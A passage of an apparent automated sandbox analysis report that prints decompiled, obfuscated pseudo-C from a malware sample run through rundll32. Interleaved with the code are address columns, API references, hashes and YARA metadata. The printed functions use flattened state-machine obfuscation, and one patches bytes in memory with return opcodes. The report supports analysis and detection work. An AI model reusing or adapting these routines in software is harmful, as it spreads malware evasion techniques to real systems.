				_v612 = _v612 ^ 0x00050986;
				_t193 = _v612;
				do {
					while(_t162 != 0x249e110) {
						if(_t162 == 0x48c9d54) {
							_v556 = 0x22c;
							_t153 = E0069C15D(_t193, _v652, _v616,  &_v556, _v604);
							_t196 =  &(_t196[3]);
							asm("sbb ecx, ecx");
							_t167 =  ~_t153 & 0xf758a92f;
							L13:
							_t162 = _t167 + 0xe63f1a5;
							continue;
						}
						if(_t162 == 0x5bc9ad4) {
							_t156 = E00688E4D( &_v556,  &_v600);
							asm("sbb ecx, ecx");
							_t167 =  ~_t156 & 0xf3e5ef6b;
							goto L13;
						}
						if(_t162 == 0xac58df2) {
							_v576 = _t187;
							_t162 = 0xcf1a497;
							continue;
						}
						if(_t162 != 0xcf1a497) {
							if(_t162 == 0xe63f1a5) {
								return E00691E67(_v632, _v628, _v640, _v612, _t193);
							}
							goto L18;
						}
						_push(_t162);
						_t156 = E00685988(_t162, _v608);
						_t193 = _t156;
						if(_t156 != 0xffffffff) {
							_t162 = 0x48c9d54;
							continue;
						}
						L8:
						return _t156;
					}
					_t151 = E00682A58(_v648, _t193,  &_v556, _v636, _v620);
					_t196 =  &(_t196[3]);
					if(_t151 == 0) {
						_t162 = 0xe63f1a5;
						goto L18;
					} else {
						_t162 = 0x5bc9ad4;
						continue;
					}
					goto L8;
					L18:
				} while (_t162 != 0xad68edc);
				return _t156;
			}

































                                                                                                                      0x0068e2d6
                                                                                                                      0x0068e2dd
                                                                                                                      0x0068e2e4
                                                                                                                      0x0068e2e5
                                                                                                                      0x0068e2ea
                                                                                                                      0x0068e2ec
                                                                                                                      0x0068e2f1
                                                                                                                      0x0068e2f9
                                                                                                                      0x0068e2fc
                                                                                                                      0x0068e306
                                                                                                                      0x0068e30e
                                                                                                                      0x0068e313
                                                                                                                      0x0068e31b
                                                                                                                      0x0068e322
                                                                                                                      0x0068e325
                                                                                                                      0x0068e331
                                                                                                                      0x0068e335
                                                                                                                      0x0068e33d
                                                                                                                      0x0068e345
                                                                                                                      0x0068e34d
                                                                                                                      0x0068e355
                                                                                                                      0x0068e359
                                                                                                                      0x0068e361
                                                                                                                      0x0068e369
                                                                                                                      0x0068e36e
                                                                                                                      0x0068e37a
                                                                                                                      0x0068e37f
                                                                                                                      0x0068e385
                                                                                                                      0x0068e38d
                                                                                                                      0x0068e395
                                                                                                                      0x0068e39a
                                                                                                                      0x0068e3a2
                                                                                                                      0x0068e3aa
                                                                                                                      0x0068e3b2
                                                                                                                      0x0068e3b7
                                                                                                                      0x0068e3bf
                                                                                                                      0x0068e3cb
                                                                                                                      0x0068e3d0
                                                                                                                      0x0068e3d6
                                                                                                                      0x0068e3de
                                                                                                                      0x0068e3e6
                                                                                                                      0x0068e3ee
                                                                                                                      0x0068e3fa
                                                                                                                      0x0068e3ff
                                                                                                                      0x0068e405
                                                                                                                      0x0068e40d
                                                                                                                      0x0068e415
                                                                                                                      0x0068e41d
                                                                                                                      0x0068e425
                                                                                                                      0x0068e42d
                                                                                                                      0x0068e435
                                                                                                                      0x0068e43d
                                                                                                                      0x0068e449
                                                                                                                      0x0068e44c
                                                                                                                      0x0068e450
                                                                                                                      0x0068e458
                                                                                                                      0x0068e460
                                                                                                                      0x0068e46a
                                                                                                                      0x0068e474
                                                                                                                      0x0068e47c
                                                                                                                      0x0068e484
                                                                                                                      0x0068e48e
                                                                                                                      0x0068e492
                                                                                                                      0x0068e49a
                                                                                                                      0x0068e4a2
                                                                                                                      0x0068e4aa
                                                                                                                      0x0068e4af
                                                                                                                      0x0068e4b7
                                                                                                                      0x0068e4bb
                                                                                                                      0x0068e4bb
                                                                                                                      0x0068e4c9
                                                                                                                      0x0068e56a
                                                                                                                      0x0068e57d
                                                                                                                      0x0068e582
                                                                                                                      0x0068e589
                                                                                                                      0x0068e58b
                                                                                                                      0x0068e55b
                                                                                                                      0x0068e55b
                                                                                                                      0x00000000
                                                                                                                      0x0068e55b
                                                                                                                      0x0068e4d5
                                                                                                                      0x0068e54a
                                                                                                                      0x0068e553
                                                                                                                      0x0068e555
                                                                                                                      0x00000000
                                                                                                                      0x0068e555
                                                                                                                      0x0068e4dd
                                                                                                                      0x0068e532
                                                                                                                      0x0068e536
                                                                                                                      0x00000000
                                                                                                                      0x0068e536
                                                                                                                      0x0068e4e5
                                                                                                                      0x0068e4e9
                                                                                                                      0x00000000
                                                                                                                      0x0068e505
                                                                                                                      0x00000000
                                                                                                                      0x0068e4e9
                                                                                                                      0x0068e51b
                                                                                                                      0x0068e520
                                                                                                                      0x0068e525
                                                                                                                      0x0068e52c
                                                                                                                      0x0068e52e
                                                                                                                      0x00000000
                                                                                                                      0x0068e52e
                                                                                                                      0x0068e512
                                                                                                                      0x0068e512
                                                                                                                      0x0068e512
                                                                                                                      0x0068e5a6
                                                                                                                      0x0068e5ab
                                                                                                                      0x0068e5b0
                                                                                                                      0x0068e5bc
                                                                                                                      0x00000000
                                                                                                                      0x0068e5b2
                                                                                                                      0x0068e5b2
                                                                                                                      0x00000000
                                                                                                                      0x0068e5b2
                                                                                                                      0x00000000
                                                                                                                      0x0068e5be
                                                                                                                      0x0068e5be
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: If$R5C$^Q$`ee$f~8$o`$N
                                                                                                                      • API String ID: 0-3572798563
                                                                                                                      • Opcode ID: 0d0dab3ceb09791deef85f5d6326cd93d027299f435210b68a2181010516b070
                                                                                                                      • Instruction ID: f342dfafa9e80babf85e3cd826d809a258b3bae1564d0620afbb84b96af69533
                                                                                                                      • Opcode Fuzzy Hash: 0d0dab3ceb09791deef85f5d6326cd93d027299f435210b68a2181010516b070
                                                                                                                      • Instruction Fuzzy Hash: 1A7175725083019FC758DF22C88985FBBE2EBC4768F504A1DF596962A0D7768A09CF87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10014B71 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _strcpy_s.LIBCMT ref: 10014B9E
                                                                                                                        • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                      • __snprintf_s.LIBCMT ref: 10014BD7
                                                                                                                        • Part of subcall function 1003119A: __vsnprintf_s_l.LIBCMT ref: 100311AF
                                                                                                                      • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 10014C02
                                                                                                                      • LoadLibraryA.KERNEL32(?), ref: 10014C25
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoLibraryLoadLocale__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
                                                                                                                      • String ID: LOC
                                                                                                                      • API String ID: 3864805678-519433814
                                                                                                                      • Opcode ID: 993ef955d11e1d056c0da4e243e940ae0abcf9c49e17b7ca6a81ba24efbb4c92
                                                                                                                      • Instruction ID: c6b9acf05ba5f485c5c472c95a6cc1a1d49ea65b07ecc8430683ae88ba63382e
                                                                                                                      • Opcode Fuzzy Hash: 993ef955d11e1d056c0da4e243e940ae0abcf9c49e17b7ca6a81ba24efbb4c92
                                                                                                                      • Instruction Fuzzy Hash: B011E471900118AFDB11DB64CC86BDD73B8EF09315F1241A1F7059F0A1EEB0E9859AD1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0068CF47 Relevance: 7.9, Strings: 6, Instructions: 380COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0068CF47(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20) {
				char _v32;
				intOrPtr _v40;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v88;
				char* _v92;
				char _v112;
				char _v120;
				intOrPtr _v124;
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				void* _t345;
				void* _t377;
				void* _t378;
				void* _t386;
				void* _t393;
				intOrPtr _t403;
				intOrPtr* _t406;
				void* _t408;
				signed char* _t414;
				signed char* _t450;
				intOrPtr* _t455;
				intOrPtr _t456;
				intOrPtr _t457;
				void* _t458;
				signed char* _t459;
				signed int _t460;
				signed int _t461;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				void* _t470;
				void* _t471;
				void* _t474;

				_t406 = _a8;
				_t456 = _a4;
				_push(_a20);
				_t455 = _a16;
				_push(_t455);
				_push(_a12);
				_push(_t406);
				_push(_t456);
				_push(__edx);
				_push(__ecx);
				E006920B9(_t345);
				_v256 = 0xcf1dac;
				_t471 = _t470 + 0x1c;
				_v256 = _v256 ^ 0x662b1d0f;
				_v256 = _v256 << 2;
				_t408 = 0x8e80a37;
				_v256 = _v256 + 0xffff9089;
				_v256 = _v256 ^ 0x9b8f9315;
				_v160 = 0x25617a;
				_v160 = _v160 << 2;
				_v160 = _v160 ^ 0x009585a8;
				_v264 = 0x39e017;
				_v264 = _v264 + 0xffffbc9c;
				_v264 = _v264 ^ 0xb11c7ead;
				_v264 = _v264 + 0xffffd7b2;
				_v264 = _v264 ^ 0xb125b990;
				_v240 = 0xb82586;
				_t460 = 0x74;
				_v240 = _v240 / _t460;
				_v240 = _v240 << 1;
				_t461 = 0x3b;
				_v132 = _v132 & 0x00000000;
				_v240 = _v240 * 0x36;
				_v240 = _v240 ^ 0x00aace1a;
				_v180 = 0xcab8fe;
				_v180 = _v180 ^ 0xca9451c5;
				_v180 = _v180 | 0x3e03c42f;
				_v180 = _v180 ^ 0xfe5c53ad;
				_v248 = 0x57862;
				_v248 = _v248 | 0x3f7dcfba;
				_v248 = _v248 / _t461;
				_t462 = 0x62;
				_v248 = _v248 / _t462;
				_v248 = _v248 ^ 0x00057d9a;
				_v252 = 0x68f561;
				_v252 = _v252 << 6;
				_v252 = _v252 >> 0xd;
				_v252 = _v252 | 0x3cddc102;
				_v252 = _v252 ^ 0x3cda88f2;
				_v192 = 0x7c8e99;
				_v192 = _v192 + 0x829c;
				_v192 = _v192 * 0x31;
				_v192 = _v192 ^ 0x17fda794;
				_v228 = 0x74d91a;
				_v228 = _v228 << 3;
				_v228 = _v228 + 0x7502;
				_v228 = _v228 * 0x63;
				_v228 = _v228 ^ 0x69a7ce60;
				_v208 = 0xc909ae;
				_v208 = _v208 << 1;
				_t463 = 0xb;
				_v208 = _v208 / _t463;
				_v208 = _v208 ^ 0x00276772;
				_v164 = 0x673800;
				_v164 = _v164 << 9;
				_v164 = _v164 ^ 0xce7e8a93;
				_v232 = 0xb859bd;
				_v232 = _v232 + 0xde76;
				_t464 = 0x5b;
				_v232 = _v232 * 0x1c;
				_v232 = _v232 * 0x30;
				_v232 = _v232 ^ 0xcc63b0a7;
				_v172 = 0x7eda56;
				_v172 = _v172 << 3;
				_v172 = _v172 ^ 0x03f50911;
				_v184 = 0x2f7891;
				_v184 = _v184 / _t464;
				_t465 = 0x41;
				_v184 = _v184 * 0x49;
				_v184 = _v184 ^ 0x0024fbf7;
				_v148 = 0x4a0bea;
				_v148 = _v148 ^ 0x502016f1;
				_v148 = _v148 ^ 0x506ad42a;
				_v260 = 0x9ebd58;
				_v260 = _v260 >> 8;
				_v260 = _v260 << 0xf;
				_v260 = _v260 + 0xb306;
				_v260 = _v260 ^ 0x4f54a3e8;
				_v204 = 0xce3506;
				_v204 = _v204 << 0xf;
				_v204 = _v204 << 0xc;
				_v204 = _v204 ^ 0x300ddb73;
				_v244 = 0xe7c592;
				_v244 = _v244 >> 5;
				_v244 = _v244 ^ 0x506a7775;
				_v244 = _v244 << 1;
				_v244 = _v244 ^ 0xa0d2afa7;
				_v268 = 0x1d8a79;
				_v268 = _v268 << 2;
				_v268 = _v268 / _t465;
				_v268 = _v268 | 0x253986a4;
				_v268 = _v268 ^ 0x2531568a;
				_v216 = 0x116531;
				_t466 = 0x61;
				_v216 = _v216 * 0x66;
				_v216 = _v216 ^ 0xfffdc9ed;
				_v216 = _v216 ^ 0xf917010b;
				_v200 = 0xc05f9c;
				_v200 = _v200 / _t466;
				_v200 = _v200 * 0x6f;
				_v200 = _v200 ^ 0x00dca3d1;
				_v212 = 0xdb89ea;
				_v212 = _v212 >> 0xa;
				_v212 = _v212 >> 9;
				_v212 = _v212 ^ 0x0000ad8d;
				_v152 = 0x38fb70;
				_v152 = _v152 ^ 0x310cc67b;
				_v152 = _v152 ^ 0x313af23a;
				_v136 = 0x7e2008;
				_v136 = _v136 ^ 0x7ad3030b;
				_v136 = _v136 ^ 0x7aaaa86e;
				_v196 = 0x9c4278;
				_t467 = 0x4e;
				_v196 = _v196 * 0x7e;
				_v196 = _v196 ^ 0xa26962db;
				_v196 = _v196 ^ 0xee89d9da;
				_v220 = 0x1e88f4;
				_v220 = _v220 >> 4;
				_v220 = _v220 >> 7;
				_v220 = _v220 ^ 0x000c14cc;
				_v140 = 0xc2e6ba;
				_v140 = _v140 + 0x8875;
				_v140 = _v140 ^ 0x00c43ba1;
				_v188 = 0xdb74c;
				_v188 = _v188 << 4;
				_v188 = _v188 * 0x5c;
				_v188 = _v188 ^ 0x4edda20a;
				_v236 = 0x62ea5;
				_v236 = _v236 / _t467;
				_v236 = _v236 >> 0xb;
				_v236 = _v236 ^ 0x7372adb3;
				_v236 = _v236 ^ 0x73757ff2;
				_v144 = 0x2b6271;
				_v144 = _v144 ^ 0x1ac7dce1;
				_v144 = _v144 ^ 0x1ae73668;
				_v224 = 0x8bb898;
				_v224 = _v224 + 0x43a9;
				_v224 = _v224 << 0x10;
				_t468 = 0x71;
				_t469 = _v132;
				_v224 = _v224 / _t468;
				_v224 = _v224 ^ 0x023712cd;
				_v156 = 0xb23c07;
				_v156 = _v156 + 0x4ded;
				_v156 = _v156 ^ 0x00b7ca1c;
				_v168 = 0xb501ce;
				_v168 = _v168 ^ 0x6706c67f;
				_v168 = _v168 ^ 0x67b3c7a1;
				_v176 = 0xab8984;
				_v176 = _v176 * 0x22;
				_v176 = _v176 ^ 0x16c84308;
				goto L1;
				do {
					while(1) {
						L1:
						_t474 = _t408 - 0xd9acfaa;
						if(_t474 > 0) {
							break;
						}
						if(_t474 == 0) {
							E00698519(_v236, _v144, _v128);
							_t408 = 0xfbb751f;
							continue;
						}
						if(_t408 == 0x15a913b) {
							_v40 = _t456;
							_v92 =  &_v32;
							_v56 =  *_t455;
							_v52 =  *((intOrPtr*)(_t455 + 4));
							_v88 = 0x20;
							_t393 = E00687735(_v192,  &_v112,  &_v120, _v228, _v208);
							_t471 = _t471 + 0x10;
							if(_t393 == 0) {
								L20:
								return _v132;
							}
							_t408 = 0xf0a856e;
							continue;
						}
						if(_t408 == 0x3749e66) {
							_t469 = E00690AE0(_v176, _v168);
							_t408 = 0x46acfc9;
							 *((intOrPtr*)(_t406 + 4)) = _v160 + _v124 + _t469;
							continue;
						}
						if(_t408 == 0x46acfc9) {
							_push(_t408);
							_push(_t408);
							_t403 = E00687FF2( *((intOrPtr*)(_t406 + 4)));
							 *_t406 = _t403;
							if(_t403 == 0) {
								_t408 = 0xd9acfaa;
							} else {
								_v132 = 1;
								_t408 = 0xfb3baa2;
							}
							continue;
						}
						if(_t408 != 0x8e80a37) {
							goto L31;
						}
						_t408 = 0xfac38db;
					}
					if(_t408 == 0xf0a856e) {
						_t377 = E006870B3(_v164,  &_v128,  &_v120, _v232, _v172);
						_t471 = _t471 + 0xc;
						if(_t377 == 0) {
							_t408 = 0xfbb751f;
							goto L31;
						}
						_t408 = 0x3749e66;
						goto L1;
					}
					if(_t408 == 0xfac38db) {
						_push( *_t455);
						_t378 = E0069AE6D(_v240,  &_v32,  *((intOrPtr*)(_t455 + 4)), _v180, _t408, _v248);
						_t471 = _t471 + 0x14;
						if(_t378 == 0) {
							goto L20;
						}
						_t408 = 0x15a913b;
						goto L1;
					}
					if(_t408 == 0xfb3baa2) {
						_t457 =  *_t406;
						E00687E87(_v268, _v216, _v200, _t457);
						_t458 = _t457 + _v264;
						E0068ED7E(_v212, _t458, _v152, _v128, _v124);
						_t459 = _t458 + _v124;
						E0068A492(_v196, _v220, _t459, _t469);
						_t450 =  &(_t459[_t469]);
						_t471 = _t471 + 0x20;
						_t414 = _t459;
						if(_t459 >= _t450) {
							L25:
							_t386 = E00690AE0(0xe, 0);
							_t408 = 0xd9acfaa;
							 *((char*)(_t386 + _t459)) = 0;
							_t456 = _a4;
							goto L1;
						} else {
							goto L22;
						}
						do {
							L22:
							if(( *_t414 & 0x000000ff) == _v256) {
								 *_t414 = 0xc3;
							}
							_t414 =  &(_t414[1]);
						} while (_t414 < _t450);
						goto L25;
					}
					if(_t408 != 0xfbb751f) {
						goto L31;
					}
					E00698519(_v224, _v156, _v120);
					goto L20;
					L31:
				} while (_t408 != 0x5927677);
				goto L20;
			}












































































                                                                                                                      0x0068cf4e
                                                                                                                      0x0068cf57
                                                                                                                      0x0068cf5f
                                                                                                                      0x0068cf66
                                                                                                                      0x0068cf6d
                                                                                                                      0x0068cf6e
                                                                                                                      0x0068cf75
                                                                                                                      0x0068cf76
                                                                                                                      0x0068cf77
                                                                                                                      0x0068cf78
                                                                                                                      0x0068cf79
                                                                                                                      0x0068cf7e
                                                                                                                      0x0068cf86
                                                                                                                      0x0068cf89
                                                                                                                      0x0068cf93
                                                                                                                      0x0068cf98
                                                                                                                      0x0068cf9d
                                                                                                                      0x0068cfa5
                                                                                                                      0x0068cfad
                                                                                                                      0x0068cfb8
                                                                                                                      0x0068cfc0
                                                                                                                      0x0068cfcb
                                                                                                                      0x0068cfd3
                                                                                                                      0x0068cfdb
                                                                                                                      0x0068cfe3
                                                                                                                      0x0068cfeb
                                                                                                                      0x0068cff3
                                                                                                                      0x0068d001
                                                                                                                      0x0068d006
                                                                                                                      0x0068d00c
                                                                                                                      0x0068d015
                                                                                                                      0x0068d018
                                                                                                                      0x0068d020
                                                                                                                      0x0068d024
                                                                                                                      0x0068d02c
                                                                                                                      0x0068d034
                                                                                                                      0x0068d03c
                                                                                                                      0x0068d044
                                                                                                                      0x0068d04c
                                                                                                                      0x0068d054
                                                                                                                      0x0068d064
                                                                                                                      0x0068d06c
                                                                                                                      0x0068d06f
                                                                                                                      0x0068d073
                                                                                                                      0x0068d07b
                                                                                                                      0x0068d083
                                                                                                                      0x0068d088
                                                                                                                      0x0068d08d
                                                                                                                      0x0068d095
                                                                                                                      0x0068d09d
                                                                                                                      0x0068d0a5
                                                                                                                      0x0068d0b2
                                                                                                                      0x0068d0b6
                                                                                                                      0x0068d0be
                                                                                                                      0x0068d0c6
                                                                                                                      0x0068d0cb
                                                                                                                      0x0068d0d8
                                                                                                                      0x0068d0dc
                                                                                                                      0x0068d0e4
                                                                                                                      0x0068d0ec
                                                                                                                      0x0068d0f8
                                                                                                                      0x0068d0fd
                                                                                                                      0x0068d103
                                                                                                                      0x0068d10b
                                                                                                                      0x0068d116
                                                                                                                      0x0068d11e
                                                                                                                      0x0068d129
                                                                                                                      0x0068d131
                                                                                                                      0x0068d13e
                                                                                                                      0x0068d141
                                                                                                                      0x0068d14a
                                                                                                                      0x0068d14e
                                                                                                                      0x0068d156
                                                                                                                      0x0068d15e
                                                                                                                      0x0068d163
                                                                                                                      0x0068d16b
                                                                                                                      0x0068d17b
                                                                                                                      0x0068d184
                                                                                                                      0x0068d187
                                                                                                                      0x0068d18b
                                                                                                                      0x0068d193
                                                                                                                      0x0068d19e
                                                                                                                      0x0068d1a9
                                                                                                                      0x0068d1b4
                                                                                                                      0x0068d1bc
                                                                                                                      0x0068d1c1
                                                                                                                      0x0068d1c6
                                                                                                                      0x0068d1ce
                                                                                                                      0x0068d1d6
                                                                                                                      0x0068d1de
                                                                                                                      0x0068d1e3
                                                                                                                      0x0068d1e8
                                                                                                                      0x0068d1f0
                                                                                                                      0x0068d1f8
                                                                                                                      0x0068d1fd
                                                                                                                      0x0068d205
                                                                                                                      0x0068d209
                                                                                                                      0x0068d211
                                                                                                                      0x0068d219
                                                                                                                      0x0068d226
                                                                                                                      0x0068d22a
                                                                                                                      0x0068d232
                                                                                                                      0x0068d23a
                                                                                                                      0x0068d247
                                                                                                                      0x0068d248
                                                                                                                      0x0068d24c
                                                                                                                      0x0068d254
                                                                                                                      0x0068d25c
                                                                                                                      0x0068d26a
                                                                                                                      0x0068d273
                                                                                                                      0x0068d277
                                                                                                                      0x0068d27f
                                                                                                                      0x0068d287
                                                                                                                      0x0068d28c
                                                                                                                      0x0068d291
                                                                                                                      0x0068d299
                                                                                                                      0x0068d2a4
                                                                                                                      0x0068d2af
                                                                                                                      0x0068d2ba
                                                                                                                      0x0068d2c5
                                                                                                                      0x0068d2d0
                                                                                                                      0x0068d2db
                                                                                                                      0x0068d2ec
                                                                                                                      0x0068d2ef
                                                                                                                      0x0068d2f3
                                                                                                                      0x0068d2fb
                                                                                                                      0x0068d303
                                                                                                                      0x0068d30b
                                                                                                                      0x0068d310
                                                                                                                      0x0068d315
                                                                                                                      0x0068d31d
                                                                                                                      0x0068d328
                                                                                                                      0x0068d333
                                                                                                                      0x0068d33e
                                                                                                                      0x0068d346
                                                                                                                      0x0068d350
                                                                                                                      0x0068d354
                                                                                                                      0x0068d35c
                                                                                                                      0x0068d36c
                                                                                                                      0x0068d370
                                                                                                                      0x0068d375
                                                                                                                      0x0068d37d
                                                                                                                      0x0068d385
                                                                                                                      0x0068d390
                                                                                                                      0x0068d39b
                                                                                                                      0x0068d3a6
                                                                                                                      0x0068d3ae
                                                                                                                      0x0068d3b6
                                                                                                                      0x0068d3bf
                                                                                                                      0x0068d3c2
                                                                                                                      0x0068d3c9
                                                                                                                      0x0068d3cd
                                                                                                                      0x0068d3d5
                                                                                                                      0x0068d3e0
                                                                                                                      0x0068d3eb
                                                                                                                      0x0068d3f6
                                                                                                                      0x0068d3fe
                                                                                                                      0x0068d406
                                                                                                                      0x0068d40e
                                                                                                                      0x0068d41b
                                                                                                                      0x0068d41f
                                                                                                                      0x0068d41f
                                                                                                                      0x0068d427
                                                                                                                      0x0068d427
                                                                                                                      0x0068d427
                                                                                                                      0x0068d427
                                                                                                                      0x0068d42d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068d433
                                                                                                                      0x0068d553
                                                                                                                      0x0068d559
                                                                                                                      0x00000000
                                                                                                                      0x0068d559
                                                                                                                      0x0068d43f
                                                                                                                      0x0068d4e3
                                                                                                                      0x0068d4f6
                                                                                                                      0x0068d4ff
                                                                                                                      0x0068d509
                                                                                                                      0x0068d51f
                                                                                                                      0x0068d52b
                                                                                                                      0x0068d530
                                                                                                                      0x0068d535
                                                                                                                      0x0068d5a7
                                                                                                                      0x0068d5b8
                                                                                                                      0x0068d5b8
                                                                                                                      0x0068d537
                                                                                                                      0x00000000
                                                                                                                      0x0068d537
                                                                                                                      0x0068d44b
                                                                                                                      0x0068d4b7
                                                                                                                      0x0068d4cb
                                                                                                                      0x0068d4d0
                                                                                                                      0x00000000
                                                                                                                      0x0068d4d0
                                                                                                                      0x0068d453
                                                                                                                      0x0068d477
                                                                                                                      0x0068d478
                                                                                                                      0x0068d479
                                                                                                                      0x0068d47e
                                                                                                                      0x0068d484
                                                                                                                      0x0068d498
                                                                                                                      0x0068d486
                                                                                                                      0x0068d486
                                                                                                                      0x0068d491
                                                                                                                      0x0068d491
                                                                                                                      0x00000000
                                                                                                                      0x0068d484
                                                                                                                      0x0068d45b
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068d461
                                                                                                                      0x0068d461
                                                                                                                      0x0068d569
                                                                                                                      0x0068d6ac
                                                                                                                      0x0068d6b1
                                                                                                                      0x0068d6b6
                                                                                                                      0x0068d6c2
                                                                                                                      0x00000000
                                                                                                                      0x0068d6c2
                                                                                                                      0x0068d6b8
                                                                                                                      0x00000000
                                                                                                                      0x0068d6b8
                                                                                                                      0x0068d575
                                                                                                                      0x0068d65b
                                                                                                                      0x0068d674
                                                                                                                      0x0068d679
                                                                                                                      0x0068d67e
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068d684
                                                                                                                      0x00000000
                                                                                                                      0x0068d684
                                                                                                                      0x0068d581
                                                                                                                      0x0068d5b9
                                                                                                                      0x0068d5c8
                                                                                                                      0x0068d5d1
                                                                                                                      0x0068d5ee
                                                                                                                      0x0068d5f3
                                                                                                                      0x0068d60e
                                                                                                                      0x0068d613
                                                                                                                      0x0068d616
                                                                                                                      0x0068d619
                                                                                                                      0x0068d61d
                                                                                                                      0x0068d630
                                                                                                                      0x0068d63f
                                                                                                                      0x0068d646
                                                                                                                      0x0068d64b
                                                                                                                      0x0068d64f
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068d61f
                                                                                                                      0x0068d61f
                                                                                                                      0x0068d626
                                                                                                                      0x0068d628
                                                                                                                      0x0068d628
                                                                                                                      0x0068d62b
                                                                                                                      0x0068d62c
                                                                                                                      0x00000000
                                                                                                                      0x0068d61f
                                                                                                                      0x0068d589
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068d5a1
                                                                                                                      0x00000000
                                                                                                                      0x0068d6c7
                                                                                                                      0x0068d6c7
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $qb+$rg'$uwjP$za%$M
                                                                                                                      • API String ID: 0-3591755710
                                                                                                                      • Opcode ID: da7435b32c5398bb183d40738941ae657b2ab1072f7b303e1b7fc0a3233c1fa4
                                                                                                                      • Instruction ID: 84c7abc700a7581bdc5ae8e8fd859eee550ffddc10bfb16ee88d8faa1370318b
                                                                                                                      • Opcode Fuzzy Hash: da7435b32c5398bb183d40738941ae657b2ab1072f7b303e1b7fc0a3233c1fa4
                                                                                                                      • Instruction Fuzzy Hash: FD1211715083809FD768DF25C486A5BFBF2FBC4348F208A1DF69A86261DBB19944CF52
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0069907F Relevance: 7.8, Strings: 6, Instructions: 261COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0069907F(intOrPtr* __ecx) {
				intOrPtr* _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				unsigned int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				void* _t284;
				void* _t285;
				intOrPtr _t286;
				void* _t293;
				void* _t301;
				signed int _t304;
				signed int _t305;
